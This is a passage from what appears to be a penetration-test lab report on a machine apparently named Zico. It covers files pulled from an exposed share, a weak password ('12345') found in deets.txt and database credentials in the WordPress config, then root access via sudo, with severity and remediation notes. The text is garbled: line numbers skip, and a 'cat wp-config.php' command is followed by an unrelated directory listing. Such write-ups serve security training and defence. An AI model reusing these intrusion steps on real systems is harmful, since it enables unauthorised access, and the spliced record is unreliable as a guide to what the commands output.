zico-history.tar.gz 747 | ``` 748 | 749 | Inspecting the files, we find database credentials in `wp-config.php` in the Wordpress directory. 750 | 751 | ``` 752 | $ cat wp-config.php 753 | dir 920 | . D 0 Tue Aug 15 07:05:52 2017 921 | .. D 0 Mon Aug 14 08:34:47 2017 922 | wordpress D 0 Tue Aug 15 07:21:08 2017 923 | Backnode_files D 0 Mon Aug 14 08:08:26 2017 924 | wp D 0 Tue Aug 15 06:51:23 2017 925 | deets.txt N 139 Mon Aug 14 08:20:05 2017 926 | robots.txt N 92 Mon Aug 14 08:36:14 2017 927 | todolist.txt N 79 Mon Aug 14 08:39:56 2017 928 | apache D 0 Mon Aug 14 08:35:19 2017 929 | index.html N 36072 Sun Aug 6 01:02:15 2017 930 | info.php N 20 Tue Aug 15 06:55:19 2017 931 | test D 0 Mon Aug 14 08:35:10 2017 932 | old D 0 Mon Aug 14 08:35:13 2017 933 | 934 | 3029776 blocks of size 1024. 1404884 blocks available 935 | ``` 936 | 937 | Nice, we have a listing of the files hosted on the web server. Very interesting! Unfortunately, we cannot put a webshell through `put`, but we can pull interesting files and inspect them. The file `deets.txt` contains a password of `12345`, but we're not sure what the account is or who it is for. Further, we get some database credentials from the Wordpress configuration. 938 | 939 | ```php 940 | # cat wp-config.php 941 | Since we gained shell access at this point, I did not look at the IRC port that is open any further. 965 | 966 | ##### Severity 967 | 968 | `Critical` - Anyone with connectivity to the target machine can gain access to sensitive files through the exposed share, and potentially guess or bruteforce the weak credentials to gain SSH access to the machine. 969 | 970 | ##### Remediation 971 | 972 | - Choose stronger passwords for services, especially external services such as SSH. 973 | - Limit (database) account privileges according to least privilege. 974 | - Limit network access to SSH and MySQL if remote access to these ports is not required. 975 | 976 | ##### Proof 977 | 978 | ![79550bc5070dbaccbc95e0795d41a50f.png](_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png) 979 | 980 | #### Privilege Escalation 981 | 982 | ##### Vulnerability exploitation 983 | 984 | From the last screenshot (`id`), we notice we are in the `sudo` group. Running `sudo -l` and specifying the password of 12345 shows us that we can run *all* commands as root, which means we can trivially escalate our privileges by running `sudo su`! 985 | 986 | ##### Severity 987 | 988 | `High` - Anyone with access to the `sudo` group or similar privileges in the `sudoers` file can trivially gain full control over the system. 989 | 990 | ##### Remediation 991 | 992 | Limit `sudo` privileges on a least-privilege basis. 993 | 994 | ##### Proof 995 | 996 | ![6b320de16f8019995f35475af9004dd2.png](_resources/e6f2888300044268a027062aa4973311.png) --------------------------------------------------------------------------------